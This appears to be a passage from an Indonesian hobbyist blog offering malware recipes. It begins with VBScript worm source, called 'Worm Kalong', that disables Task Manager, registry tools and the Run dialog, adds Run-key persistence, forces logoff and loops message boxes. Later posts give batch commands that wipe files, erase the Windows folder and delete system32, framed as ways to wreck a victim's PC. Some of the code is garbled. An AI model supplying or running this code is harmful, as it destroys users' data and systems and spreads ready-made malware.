“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions”,
“1”, “REG_DWORD”

rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoRun”,
“1”, “REG_DWORD”

rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools”,
“1”, “REG_DWORD”

rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr”,
“1”, “REG_DWORD”

‘//-Manip – Disable klik kanan-//

rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu”,
“1”, “REG_DWORD”

‘//-Manip – Munculkan Pesan Setiap Windows Startup-//

rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption”,
“Worm Kalong. Variant from Bosgentongs, don’t panic all data are safe.“

rg.regwrite “”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “AKU TELAH MENGUASAI YOUR
SISTEM!!! MAKA BERDOALAH AGAR TIDAK TERJADI“


‘//-Manip – Aktif setiap Windows Startup-//

rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Systemdir”,
winpath & “\batch- bosgentongs.exe.vbs “

‘//-Manip – Ubah RegisteredOwner dan Organization-//

rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOrganization”, “terserah”

rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOwner”,”terserah”

‘//-Manip – Membuat Cadangan di sistem svchost, MS32Dll
dan membuat ikon-//

rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\svchost”,winpath&”\terserah.exe.vb s”

rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MS32DLL”,”"

rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3”

‘//-Manip – Me-Log off komputer setelah log on BOLEH
DIHAPUS KLO MAU LIHAT EFEKNYA!!!-//


rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Logoff”,
winpath & “\System32\Logoff.exe”

‘//-Fungsi di untuk mengaktifkan kembali script dan
mengulangnya kembali-//


if check 1 then

Wscript.sleep 100000

end if

loop while check1

set sd = createobject(”Wscript.shell”)

sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

do while year(now) >= 2009

WScript.sleep 20000

‘//-Memunculkan pesan window terus menerus-//

msgbox “Selamatlah virus ini tiba di sistem ente” & vbcrlf & _

kulo nyuwun pangapuranipun menawi sampung mengganggu ente sekalian” & vbcrlf &
_

jangan kawatir dan sedih, aku tidak akan kuasai komputer bobrok ini. kini ente
sudah masuk dalam permainanku
” & vbcrlf & _

“ini hanya permainnaku yang aku kesepian di sini” & vbcrlf & _

vbcrlf & vbcrlf & _

elok-elok indah kehidupan bukan kenyataan” & vbcrlf & vbcrlf & _

saatnya kini aku bangkit dalam mimpi ituk

‘//-Mengulang kode script-//
loop


save as file tersebut dengan extensi .vbs 
semoga bermanfaat
READMORE
 

Trik sederhana dengan notepad

Menghapus Files dan Folder

1. buka notepad trus ketik DEL /F /Q *
2. save as dan simpan dengan nama test.cmd
3. kalau elo dobel klik file test.cmd maka semua files dan folder akan terhapus.

Menghapus Files Tertentu

1. buka notepad trus ketik erase C:TEST.txt
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka files TEST.txt di drive c:\ akan terhapus

Menghapus Folder Tertentu

1. buka notepad trus ketik erase C:WINDOWS
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka folder WINDOWS di drive c:\ akan terhapus


untuk menghapus file atau folder itu terserah anda mau menulis nama file atau folder yg ingin dihapus...
semoga membantu..
READMORE
 

cara menghancurkan PC lawan/korban

Warning ::
-jgn d coba di PC sndiri
-segala akibat di tanggung sendiri
-ini script virus sederhana namun mematikan

langsung aja ::

1. Buka Notepad
2. lalu tulis perintah berikut ::

del c:WINDOWSsystem32*.*/q

3.simpan dengan extensi .bat atau .cmd
4.selesai
ingat,virus ini akan aktif jika di klik 2x...
so jangan di klik....!
klo penasaran coba aja..!
:)
READMORE